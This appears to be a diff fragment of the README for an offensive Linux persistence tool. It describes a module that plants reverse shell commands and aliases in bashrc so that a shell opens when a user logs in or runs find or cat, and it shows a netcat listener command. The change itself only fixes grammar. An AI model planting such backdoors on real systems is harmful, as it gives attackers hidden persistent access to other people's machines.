Trevohack/DynastyPersist/README.md

 #### Bashrc Persistence

 * This module, writes reverse shell commands, aliases, and variables for reverse access.
-A shell is gifted when a user logins to the server or the person use `find` or `cat`.
+A shell is gifted when a user logs in to the server or the person uses `find` or `cat`.

 ```bash
 root@kali ~ nc -nvlp 9999